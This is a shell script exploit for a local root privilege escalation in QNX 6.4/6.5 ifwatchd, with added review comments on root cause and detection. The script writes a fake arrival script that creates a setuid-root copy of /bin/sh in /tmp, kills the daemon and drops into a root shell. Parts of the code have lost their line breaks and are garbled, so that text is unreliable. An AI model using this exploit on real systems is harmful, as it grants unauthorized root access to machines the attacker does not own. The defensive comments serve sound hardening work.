#!/bin/sh##QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013# <vincitamorpatriae@gmail.com>## - vulnerability description:# Setuid root ifwatchd watches for addresses added to or deleted from network# interfaces and calls up/down scripts for them. Any user can launch ifwatchd# and provide arbitrary up/down scripts. Unfortunately ifwatchd does not drop# privileges when executing user supplied scripts.## - vulnerable platforms:# QNX 6.5.0SP1# QNX 6.5.0# QNX 6.4.1## - exploit description:# This exploit creates a fake arrival-script which will be executed as root by# passing it to the -A parameter of /sbin/ifwatchd. The fake arrival-script# copies /bin/sh to /tmp/shell and makes it setuid root. Once the setuid shell# is in place ifwatchd will be killed to drop the user into the root shell.## - example:# $ uname -a# QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86# $ id# uid=100(user) gid=100# $ ./qnx-ifwatchd.sh# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013## [-] creating fake arrival-script# [-] executing ifwatchd, please wait# Killed# [-] now executing suid shell# # id# uid=100(user) gid=100 euid=0(root)PATH=/bin:/usr/bin:/sbin
#
# NOTE(review): this listing has lost its original line breaks (e.g. `if[!-x`,
# `thenecho`, `_EOF_chmod`, and the `PATH=` assignment fused onto the last
# comment line above). It is kept verbatim here and not repaired.
#
# Root cause, as the header describes it: a setuid-root daemon executes a
# script path supplied by an unprivileged caller (`-A`) without dropping
# privileges first. The standard fix for this class of bug is to drop to the
# invoking user's uid/gid (or refuse non-root invocation) before exec'ing any
# user-controlled path; the vendor versions listed above are the affected ones.
#
# What the generated script does (written to /tmp/0 via the unquoted heredoc
# below, so `\$` escapes defer expansion to the child script): copies /bin/sh
# to /tmp/shell, chowns it to root and sets mode 4755, deletes itself, and then
# kills the parent ifwatchd whose PID it locates with ps|grep|awk.
#
# Detection / hardening points a defender can take from this code:
#  - /sbin/ifwatchd being started by a non-root uid with `-A`/`-D` arguments
#    pointing into a world-writable directory is the trigger to alert on.
#  - a new setuid-root file appearing under /tmp (here: /tmp/shell) is a
#    high-confidence indicator; periodic setuid audits will catch it.
#  - mounting /tmp nosuid would stop the final step (running /tmp/shell with
#    effective uid 0) even if the daemon bug is present — presumably, as this
#    depends on the platform honouring nosuid; verify on the target OS.
#  - the real remediation is the vendor fix for ifwatchd's privilege handling.
if[!-x /sbin/ifwatchd ];thenecho"error: cannot execute /sbin/ifwatchd"exit1fiecho"QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013"echoecho"[-] creating fake arrival-script"cat<<_EOF_> /tmp/0
#!/bin/sh
PATH=/bin:/usr/bin
IFWPID=\$(ps-edaf|grep"ifwatchd -A"|awk'!/grep/ { print \$2 }')
cp /bin/sh /tmp/shell
chown root:root /tmp/shell
chmod 4755 /tmp/shell
rm -f /tmp/0
kill -9 \$IFWPID
exit 0
_EOF_chmod +x /tmp/0
# The script written above is passed to the setuid daemon as its arrival
# script; the daemon, not this shell, is what executes it with root privileges.
echo"[-] executing ifwatchd, please wait"
ifwatchd -A /tmp/0 -v lo0 2>&1>/dev/null
# Expected end state per the header: ifwatchd has been killed by its own
# arrival script and /tmp/shell exists as a setuid-root copy of /bin/sh.
echo"[-] now executing suid shell"
/tmp/shell